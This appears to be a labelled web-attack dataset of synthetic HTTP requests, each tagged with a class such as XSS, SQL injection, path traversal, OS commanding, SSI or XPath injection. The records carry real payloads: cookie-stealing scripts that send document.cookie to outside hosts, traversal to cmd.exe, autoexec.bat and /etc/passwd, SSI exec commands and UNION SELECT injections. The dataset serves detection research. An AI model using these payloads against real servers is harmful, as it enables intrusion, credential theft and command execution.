GET /afB371IrXC7/n3ecss/MtTTD.asp?LpLMncGiiVaQ0=Wawheree&acnuvtzylEezge=n2LiuhN&rw0bdSj1mat=h%2BoEMem%29xchildehIn&copanacchtrstc=cax%3Dltosrer%2BsOm&oo=27&rbideaE=enh7sEoeqi&tosa8fe=u2eIineo&dnvs=%3C%21--%23email+fromhost%3D%22www.ustnteNC.com%22+tohost%3D%22mailbox.eat.com%22+message%3D%229tdod+jbS2loa+bxeshsj+gcfewa%22+fromaddress%3D%22UTss.com%22+toaddress%3D%22hd2rg.Roe.com%22+subject%3D%22sir%22+sender%3D%22lorc.com%22+replyto%3D%22nehaqr.com%22+cc%3D%22a0%22+inreplyto%3D%22hdpdr+oyt+a3aen%22+id%3D%22otemail%22+--%3E&sgpmneIlfapN=037152&feEhnjineotsehl=5009515986&RD40=ta%7Chm%29lmbc&set8ll1e=61056&K@w3qVBOox=ndiaRdetIeQsii&uTgqFKA=neno HTTP/1.0
Host: 133.142.147.102:80
Connection: Sjaa
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: ioNDu=esa9t
Client-ip: 185.110.139.50
Cookie: depasewniovkl=53;eecdonlirc=wxi-nYax1;dsnEsg6lbi779o=0080381
Cookie2: $Version="96"
Date: Fri, 24 Mar 06 11:51:04 GMT
ETag: "I6x001IZy.Iz5lBYh"
Expect: 100-continue
From: ogpe@eKhmc.uk
If-Modified-Since: Fri, 07 Jul 06 21:22:10 UTC
If-Unmodified-Since: Sat, 13 Jan 07 14:44:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Feb 07 02:24:12 CET
Max-Forwards: 533
MIME-Version: 2.5
Pragma: iat4ooch=iedRd
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: NTLM dGYyZG94dGU5dDFKYXNlaWExZ2ppZW9wY3JhYWVhN3Q=
Range: 5-9725,-6683
Referer: /oOit/ayl3rdn/araaieE3/nptlU.php
TE: trailers,deflate,gzip;q=0.3
Trailer: If-Range
User-Agent: Mozilla/3.4 (X11; U; Open BSD i586 9.3; qe-ae; rv:2.4.5) Gecko/43307382
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 272x2054
Via: 9.3 www.wmo2ho.png, 8.1 www.naierm.shtml, HTTP/7.0 www.luree.html
Transfer-Encoding: identity
Upgrade: 8gtyn/7.7, ttdrko/9.1, 7yofs/9.0
Warning: 175 www.eSis7tea.tiff:885 "oeto0awd6ika" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39255
Start - Id: 46610
class: XSS
GET /nielwzannmecie7/47coebnntrtnizTd/Caedeaauvrwa/t6hfNF61ZbE1KEbMSVRy/dTISO.j@7pKdnTWtum0N/O7/l0dBijYxkgfwFT2nZ.cgi?xnh=enawngeh&nmgectashitU=nap5shEc&mCrein=KPescript&wnHCYhwirmmioE=4e%5Da%7C%5BoM%286%5C&brod=2956975&oY3ab=0&tts8=%7Eut&eosruoF=nsMnnslImtoNo3&OnhNttEcsahfy=3agi&NOIh8_XTkwLI=lopenef&cirptaf8c=Oy1Ua&SIstdinj=8929&odea5Atrtopobae=+&ne7=o HTTP/1.0
Host: 180.89.111.26
Connection: close
Accept: text/xml, audio/x-wav
Accept-Charset: x-mac-hebrew;q=0.2, euc-cn;q=0.6, gb2312;q=0.6, windows-1254;q=0.8
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 42.100.67.21
Cookie: mftSSe=206;9tuwnc2nenls=imstylepnaaIyoldse;4TpasswdPnph-w1I3s=4;zaR=1
Cookie2: $Version="24"
Date: Tue, 19 Jun 07 16:36:02 UTC
ETag: W/"i1SzQL9_A_G6IGY"
Expect: 100-continue
From: u3eali@lfioeyoua2.it
If-Modified-Since: Wed, 13 Oct 04 13:18:59 CET
If-Unmodified-Since: Fri, 18 Feb 05 05:49:33 GMT
If-Match: "azZgVZ@U8xVGB46nAqRs"
If-None-Match: "bwy-yLhpczm2Jn2Gym"
If-Range: Wed, 02 Jul 08 12:42:25 GMT
Max-Forwards: 962
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest username="6LlGdn"
Authorization: Digest cnonce="d2earh"
Range: 29-,197659-,4-7273
Referer: http://www.Sfa2.be/2eOt/n3hgdta/sed5v/aaonee/eerodegs.swf
TE: trailers,deflate,deflate;q=0.9
Trailer: Host
User-Agent: <img    src   =  "   dees"onmouseover   =   "[document.location.replace    ('http://www.tametati.com/cgi-bin/sideri.cgi'+document.cookie);]" >
UA-CPU: PowerPC
UA-Disp: 7714,181,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 950x529
Via: 9.6 6.62.12.50, HTTP/0.7 www.ldtemnnn.css
Transfer-Encoding: compress
Upgrade: 1ssnt/2.7, Necil/0.4
Warning: 105 192.184.242.29 "Ttdmeee" 
X-Forwarded-For: 245.134.55.175
X-Serial-Number: 36731
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46610
Start - Id: 45813
class: PathTransversal
GET /nrbumatu/2JFRurxmn2osgD./thentypxetaeeahmaT/rOo1i6tor7Hrp77ibs6/nRdwb_R3MGsT/miOsK/oeont/navXngq/pweD8uet/0Li%uSetcs2/prfu0mrooehr8r/LYxHWyfy6smW0L.tiff?hmibrO=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&eaonsGZurtttIn=paoizttr5eeaqaHoo HTTP/1.1
Host: www.sa8zjC.org:4
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.7, compress;q=0.2
Accept-Language: *;q=0.3
Cache-Control: max-age=066
Client-ip: 241.101.131.168
Cookie: 9et=871;ulmie0nr=t5hY
Cookie2: $Version="27"
Date: Tue, 12 Sep 06 20:18:08 GMT
ETag: "a.tNg79xfo.c9O6l"
Expect: qbe2T2hT=o0sogd
From: rpAl@yhsq9eT1.st
If-Modified-Since: Wed, 10 Feb 10 07:16:51 UTC
If-Unmodified-Since: Wed, 31 Dec 08 22:54:44 GMT
If-Match: *
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Fri, 16 Sep 05 07:40:19 CET
Max-Forwards: 086
MIME-Version: 4.8
Pragma: tiyrnu='ee8cq'
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Enne e6ota=ceehpe
Range: 2-5,-391
Referer: http://www.yaweoi.gov/wlecep/8nuNu.php
TE: trailers
Trailer: Host
User-Agent: Mozilla/4.9 (compatible; MSIE 2.1; Mac OS X; xes7g; eshy; emrtraCgli)
UA-CPU: PowerPC
UA-Disp: 742,2997,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0280x466
Via: HTTP/0.7 135.85.253.30
Transfer-Encoding: aglu
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45813
Start - Id: 36482
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 3.59.209.94
Connection: hdwxgca
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, gzip;q=0.0
Accept-Language: dlei-rmoil, i2dpmhti-to1in, aes0e-ebwhq4s
Cache-Control: min-fresh=723
Client-ip: 221.93.140.194
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Sat, 10 Apr 10 22:20:42 UTC
ETag: "EEjfH1qoZefe@m2kmR"
Expect: diruIijb=qjnt
From: n8us@72HjX.ch
If-Modified-Since: Fri, 02 Jan 09 04:51:22 CET
If-Unmodified-Since: Fri, 26 Aug 05 06:01:32 GMT
If-Match: "7N1YxKWtlK7kFVGZeF2"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Sun, 29 Apr 07 23:18:13 GMT
Max-Forwards: 4578
MIME-Version: 9.8
Pragma: r='1dAraae'
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Basic MnJ1eHptN2U6dG1ha3NldDU=
Range: 998505-,-0540,815-
Referer: http://www.nt0oe.be/hur4tN2e.pdf
TE: gzip,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 8.4; xd-mz; rv:8.9.7) Gecko/68334316
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1357x6667
Via: HTTP/7.5 www.ahnp.jpeg, 9.6 www.2mbeo.htm:84, 0.0 89.108.133.114
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36482
Start - Id: 36789
class: OsCommanding
GET /like3wv/tefheegaaaimil2icT/rteutarabar8eeYi/skU9pnu8Z.jdW/AahutS2dedrua/iZzD@TcDsYolhcmrO2q5/winntzRs4v3htpassUfeU/egDoiZSceft5/mifems.tiff?irym=Gftpatd%5Dsiesy%3C8&Smaat0C=6+%3A+dhic&ctgeg5=%7C++++cat+..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd++++%7C&oee=894608&tlioFd=o3Z-F&hosdtao1mtuat=aUWObjtFpQ&imeT8ern=zTpWAVXB&H-OoV=ishl&54t.Y1N78BDY=3412855&tEeqai=ote&zDnph-Dkls2n.6=rv-AV3h.8VI HTTP/1.1
Host: 167.124.170.205:2
Connection: close
Accept: audio/basic;q=0.4, audio/x-wav
Accept-Charset: x-mac-icelandic, iso-8859-8;q=0.8
Accept-Encoding: 
Accept-Language: ra-tfl, ysoEwuio-e7nea;q=0.1, akm-8rxee3y7
Cache-Control: no-transform
Client-ip: 183.149.193.186
Cookie: tI=latit7sFdtejee;m7tt=569760;nr=3;Hbso0yfS9eie=ZXk4kweareta6aord;yheddrae3helT=onPabrfyCe2;onexA=:Eoul
Cookie2: $Version="396"
Date: Sun, 18 Apr 04 15:04:00 CET
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: sTisifr=eetHwwn;dEakA
From: RdaleTeo@igeTtd.be
If-Modified-Since: Sun, 02 Oct 05 07:38:02 UTC
If-Unmodified-Since: Wed, 23 Dec 09 16:42:26 GMT
If-Match: *
If-None-Match: *
If-Range: "4k3HD7n.qUbdpFqx-f"
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: t3rm pdapd=9tfhdtOA
Range: 907-5,-807
Referer: /aomelwi/2P9yc/Uyhe7szd/ratWpat/dasaet.wmn
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: uenw7hg0aacCm4tiptH
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: kge60/7.9 www.8defnw.js, HTTP/5.6 www.mdbttr.html, 5.8 12.3.26.119
Transfer-Encoding: gzip
Upgrade: wfs/7.4
Warning: 133 www.UaEc.shtml:24599 "tmgftooT" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36789
Start - Id: 46556
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: 144.177.175.180
Connection: keep-alive
Accept: image/png, image/gif
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 142.228.77.57
Cookie: lsdBHIvY49n.=7Z.H;Ux1evalT8=u/;Ise=0c7;rot=+h6;anela=ostyle/ suinsert6execenbat;ew=e@aL\ts80d4dii0e
Cookie2: $Version="6"
Date: Fri, 11 May 07 08:24:26 GMT
ETag: "pxEyZUXsotp0fFplc7L_"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Thu, 10 Feb 05 21:12:52 GMT
If-Unmodified-Since: Wed, 12 Sep 07 03:56:59 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jan 10 19:10:09 UTC
Max-Forwards: 7828
MIME-Version: 4.8
Pragma: oiiOYMe=STne
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: 739-
Referer: /lait.mp3
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: o4jlXOcfl http://www.ot1uoa.uk
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/4.5 62.178.108.127:187, dm7uta/6.7 www.egish.js
Transfer-Encoding: sihz
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46556
Start - Id: 40193
class: SSI
GET /mibxoiFsocod/hRT/Fthris3nd/jewsey/tleoier8albnaamtzto/ux40Ptn1BNYvGfh/qx./eLt6aetzumee2maw.png?ee4neLEen=%3C%21--++++%23exec+++cmd%3D%22%2Fbin%2Fls+-l+++%2Fhome%2FrywL%2FBjc8Nt%22++--%3E HTTP/1.0
Host: 32.189.43.19
Connection: cNros
Accept: */*
Accept-Charset: euc-jp, euc-kr, windows-1250
Accept-Encoding: compress, gzip;q=0.0, identity;q=0.4, deflate;q=0.0, identity
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 95.143.38.157
Cookie: 9ulompr6bso=4iE@qiJ;fKCY0P=csg2nrsetne;gssis=eVT3lAejr;aos=2;5eePslt6Nctls=aed;ffeAs=005691985
Cookie2: $Version="6"
Date: Wed, 24 May 06 17:30:39 GMT
ETag: W/"IY2@3WKoRmkzER6"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 06 Sep 06 01:53:09 CET
If-Unmodified-Since: Fri, 28 Jul 06 05:42:28 UTC
If-Match: "hOze64xiT@-oG0nf0"
If-None-Match: *
If-Range: Wed, 09 Jul 08 24:25:58 CET
Max-Forwards: 6675
MIME-Version: 7.7
Pragma: 3saQ=me77eas
Proxy-Authorization: Digest nonce
Authorization: Digest username="yxTy"
Range: 95170-36663
Referer: http://www.dOfa.ch/3Telju/ooidm2u.exe
TE: gzip;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: fzlsai1s/3.5
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9646x716
Via: 0.6 40.35.35.122, 0.7 3.184.154.12, FTP/7.3 www.b1launrl.jpg:7515
Transfer-Encoding: gzip
Upgrade: aiaEi/3.2, nenl/7.3
Warning: 193 214.100.46.242 "rhape" 
X-Serial-Number: 5910838983690
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40193
Start - Id: 40409
class: SSI
POST /ngInHof80odven/eeLIoHdB4./e@d1Kw5l7p8k@aTaGVb.php3? HTTP/1.0
Content-Length: 344
Content-Language: ttbgh7a,duhtwaw,tReeop
Content-Encoding: deflate
Content-Location: http://www.aTanaadh.fr/tttzj.nsf
Content-MD5: cmFuZWtOb2U2bXNpbHRvaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Aug 06 07:04:28 CET
Last-Modified: Fri, 17 Jul 09 08:38:17 GMT
Host: 231.142.193.27
Connection: rtnl
Accept: audio/basic;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 92.107.40.54
Cookie: ertEauci=0aLrribostwinntd6;ncca=38;otfaAoniyhypjt=31
Cookie2: $Version="3"
Date: Fri, 23 May 08 17:54:15 GMT
ETag: W/"5EI0NvigZQ0wYh_Mhu1T"
Expect: tnFAu=roDct
From: rQkb4al@ootSiafmsu.cz
If-Modified-Since: Thu, 19 Aug 04 13:25:39 UTC
If-Unmodified-Since: Mon, 19 Sep 05 06:41:24 UTC
If-Match: *
If-None-Match: "PhNL94ZtW7Zsy-l"
If-Range: Fri, 18 Jul 08 17:28:05 CET
Max-Forwards: 63
MIME-Version: 9.4
Pragma: nt1eh9hs=e
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: yrMme ovYOa5ur=Arrt
Range: -0
Referer: /d3eiln0.swf
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.7 (X11; U; Solaris 6.4; co-rh; rv:4.8.0) Gecko/06591160
UA-CPU: 68000
UA-OS: WinNT
UA-Pixels: 5480x145
Via: HTTP/9.2 www.leeE.gif:3566, FTP/5.3 64.234.32.207
Transfer-Encoding: deflate
Upgrade: ereyo/1.5
Warning: 324 55.206.31.28:42227 "mlq6npnaa" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 139491400709
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eesideVc=shT9i4ipositionee&cola=93842&who3ion6kaRaE=e1sambgsoundlibsuth&crtnhsoeei=qcrcwdIRHj&WkrJ=astv&aca=092745&iiipdned=<!--#include  virtual="d:\windows\autoexec.bat" -->&tu4nnnsfdfamy= 9ht2nk (t&eaad=nase&Hih-lKb4WwIT=fiae:kg&ueuqVCdl7na=zYU&hclffcxhjtien=&r9i~sgsiot&isqsn4aCaoachcp=eyq9&uAtGec=unionstdinexec

End - Id: 40409
Start - Id: 47031
class: XSS
GET /82/pfyhqe/5XEDCDE/enevilau2ioz/tegzyecliL3nit/Hdy/nairrpskgeneteedewui/.R53z54j.gif?eSrh5ritgaom=79&9k7Zhr=947225&3ixp__6Loo=wz7-xbzcBV&emi=66682&YSXqopen=2426&adarHK=9eteconnectxil%2B&rLs=%3Cimg++src++%3D+++%22+++javascript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.vell.com%2Fcgi-bin%2Fteriicstis.cgi%27%2Bdocument.cookie%29%3B%5D++%22%3E&edAtnte=qLzx%40M5&aoied1lsf6r7s=esarhspEeoteSk&1G9a=5783465 HTTP/1.1
Host: www.danB9gCJo.st:7
Connection: Inem
Accept: video/*
Accept-Charset: windows-1253;q=0.9
Accept-Encoding: 
Accept-Language: e3sujlnl-oTirnihh;q=0.6, s-bmncnl, 2atj-eonq;q=0.5, r-j;q=0.1
Cache-Control: only-if-cached
Client-ip: 170.28.161.6
Cookie: isro8lowutshoiw=np2f9ace02eoan7ne7;wicsfuz=pobtlae1;curq=oCeuAhL7Ce;eZc4qxDo=wMq4F
Cookie2: $Version="7"
Date: Fri, 11 Dec 09 24:12:43 UTC
ETag: W/"HbLZzhm6gPsVvrf@"
Expect: ntdeN6d
From: tGngiey@teedswatqu.fr
If-Modified-Since: Sat, 02 Aug 08 17:47:31 GMT
If-Unmodified-Since: Thu, 08 May 08 22:37:56 UTC
If-Match: "8e@KYxU.5mADLniHn1u"
If-None-Match: "CZpaCf5RW7L.av6emYQv"
If-Range: *
Max-Forwards: 5197
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: u02e nsohtc=unmnd1b
Authorization: rsea euEe=nwshmd
Range: 127-39590,86298-2
Referer: /aj3t/Aivo/fhnRnAyi/d4fdru/3hozD.mspx
TE: trailers,chunked,deflate;q=0.9
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.5 (Windows; U; WinNT 2.4; ra-ou; rv:4.8.9) Gecko/56217502
UA-CPU: MIPS
UA-Disp: 753,986,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: FTP/4.9 45.69.40.78, 9bet/6.7 www.hwd3s6.htm, 6.8 www.eLirlO.html
Transfer-Encoding: rsupb; eenN=2ess
Upgrade: tlmcr/4.0, ihaNi/9.2, ezosme/6.2
Warning: 814 www.sz2gl.html "et0hhawps" "Sun, 03 Feb 08 08:33:56 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 40030380327368685
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47031
Start - Id: 50089
class: XPathInjection
PUT /y-ham75mSO/m3Z0Im.vsDOIxM/sUrMPq_PsLE8c/httpY.Ul/3owelo1aolnrfgtl3/httpall6VoHyJHrrgjTq/yeh0sm2ilsrprgiyE4.gif? HTTP/1.0
Content-Length: 310
Content-Language: aie0u
Content-Encoding: identity
Content-Location: http://kimori.uk/qioini/EntAxt/oytdc/clheSsyu.wmn
Content-MD5: dGRlbW9wdGxscm94N04yOA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 22:09:42 CET
Last-Modified: Wed, 07 Jan 09 21:54:35 CET
Host: 124.171.176.164:0061
Connection: keep-alive
Accept: audio/*, application/rtf, video/quicktime;q=0.1
Accept-Charset: koi8-r, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 126.15.156.81
Cookie: ep0ge1bannno9ee=dk4mi Rs>(rhtr;aton70t=d/ix ci;lntKcXjwhi=narvjram;csy4Lbipm=749296537;nreqrd=9sh6/pei/5Lm/child::node()[     position()=85]    | htr/aiq0/atndc/child::text()[position()=1] or     'slmYE0o'   =';nordareq=dropceoinclude tdoE dtres:e+h
Cookie2: $Version="50"
Date: Tue, 04 Jan 05 23:28:25 CET
ETag: "h2ntYS_PIagTaRIj"
Expect: uSist
If-Modified-Since: Sat, 30 Aug 08 07:10:15 GMT
If-Unmodified-Since: Sat, 04 Oct 08 20:21:42 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 7.7
Pragma: on='tc6dEoe'
Proxy-Authorization: Digest algorithm=mrmdaea
Authorization: NTLM aHJoYXlFZGMyZWVlZ2ltb3cwZ2VUc3Jjc2N5M2l0b2VjRWVlc3QyZQ==
Range: -6254,-3
Referer: /4j3gsdh/soiptneH/ercsobta/tTesetu/gaeAs.dll
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: Mozilla/9.0 (compatible; MSIE 2.7; Linux i586; i6Xyo; bsclp7ll)
UA-CPU: 68000
UA-Disp: 534,2890,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4253x311
Via: HTTP/8.3 190.254.143.97
Transfer-Encoding: compress
Upgrade: rinmv/0.0
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
X-Serial-Number: 42303
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ne=edSqQwa&ifn5icA=wbhselect+&vJOtXED=d6twt%3Bu%5CVuwp-sopenztnodeee&jzmeta%u83XfV7=iUCAjntXCiWQ&itdlIe=0094&Ttnza=628&nafyns3lr=clKn4ym1PTy&5ldptnare=catlai2c%3A&WnoseevsnsipW=kmiu5ewinnttmpfyoiase&dclyatEHi=eT93&RcHMYaN=e2dPooeunagbo3&hmU1ChuedW=s1s&fthitsg=de4wydirkooHsuid8&9T3se4eon=81&b5iertas2osr1i=dibc

End - Id: 50089
Start - Id: 36569
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 238.94.110.42:96699
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: ae6mn3=etmtsbt
Client-ip: 117.70.6.179
Cookie: mochaorI54dvJf=a9h5n
Cookie2: $Version="139"
Date: Wed, 25 Jan 06 15:00:32 UTC
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: t4lai=ttegsbtg;8sil
From: osNAoh@aHn2nry.de
If-Modified-Since: Wed, 09 Apr 08 01:39:46 CET
If-Unmodified-Since: Sat, 06 Jun 09 15:46:16 GMT
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: *
If-Range: Wed, 06 Apr 05 08:40:52 GMT
Max-Forwards: 60
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tcpfic reesTpr=hh3orhdh
Range: -961935,910376-
Referer: /8zghw/uwvRwro/4w5fehDl/Dynansd5.js
TE: trailers,gzip;q=0.4,gzip
Trailer: If-Match
User-Agent: aeighun (r0_Ln70; cKPXzsY; uyrQXbxJ; dstrN.G; 0Fx6Z45zv)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: FTP/6.9 www.iodn.jpeg:866, 0.4 www.scCgn.jpg, 7.8 128.65.84.117
Transfer-Encoding: identity
Upgrade: t2w5X/9.8
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36569
Start - Id: 35290
class: SqlInjection
GET /6BN61.exe?r0not9t0=%27+++%29+UN%2F**%2FION+++ALL++++SEL%2F**%2FECT++%27enitio%27%2C0%2C5054%2C%27o6to%27%2C9+++FROM++dl+WHERE+%28%27%27++++%3D++++%27&n5qtJ=atsOes9u6ernqair&documentd6_a=S&ebgs6ir=asmtshxt%3Er%7Eeas&en=ekkMv_s2u&etzwNcis1tcai=1&hh3cwe=1olc9e6eeaenn-&ee9crdhdc=ruisehomeE+reftp HTTP/1.1
Host: 35.239.45.94
Connection: difmt
Accept: */*;q=0.9
Accept-Charset: windows-1258;q=0.0
Accept-Encoding: compress;q=0.0, compress, compress;q=0.9, compress;q=0.8
Accept-Language: nakp-NdnS, lefdln8f-it;q=0.6
Cache-Control: u=yoilA
Client-ip: 57.47.12.14
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Sun, 24 Jun 07 22:03:40 CET
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: tomlS4
From: s5uy73o@rSauxkH.com
If-Modified-Since: Tue, 11 Dec 07 21:04:39 CET
If-Unmodified-Since: Thu, 23 Jun 05 05:11:49 CET
If-Match: "J-pW8L9HG2GJ1E_GI7NL"
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Fri, 27 Feb 09 22:12:19 CET
Max-Forwards: 0346
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic aHJwZXVhaDpubGVwcms=
Authorization: Basic aGllZ3JlOmxxc3N1cw==
Range: 930-456,2355-
Referer: /oeDdkoE/aeaaeTed.js
TE: deflate,gzip;q=0.2
Trailer: Warning
User-Agent: frkgAlx/8.2.1
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: compress
Upgrade: efPaoi/9.4, euaos/9.4, toa/5.5
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 162.78.14.7
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35290
Start - Id: 36121
class: PathTransversal
GET /CPformNsUxy3HybZ/drT.Pi6c7Q_50/G@wy/aesseeIeetedoi.nsf?eiv8Anmak=tRKnZ4&su4sTwgi=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&ene0aNe5=oC5mf HTTP/1.1
Host: 228.52.234.20:28
Connection: iedf
Accept: */*
Accept-Charset: isiri-3342;q=0.2, x-mac-chinesetrad;q=0.7, gb2312, cp-936;q=0.0, x-mac-japanese;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=958
Client-ip: 180.199.9.54
Cookie: kto3OqTy.z_=eautoexectrw0delf2andhaopt;ZeH7OiD=eHhs
Cookie2: $Version="645"
Date: Thu, 11 Jun 09 19:54:24 UTC
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: "b5e7vsLGQtX1LeaFOqP"
If-None-Match: "0DaHq-f_qTdCAPg"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.2
Pragma: t=c
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: -984
Referer: http://www.rurnea.ch/atirto.mspx
TE: chunked
Trailer: If-Match
User-Agent: ftlopmtehcnth
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: HTTP/1.8 56.238.245.54:1
Transfer-Encoding: gzip
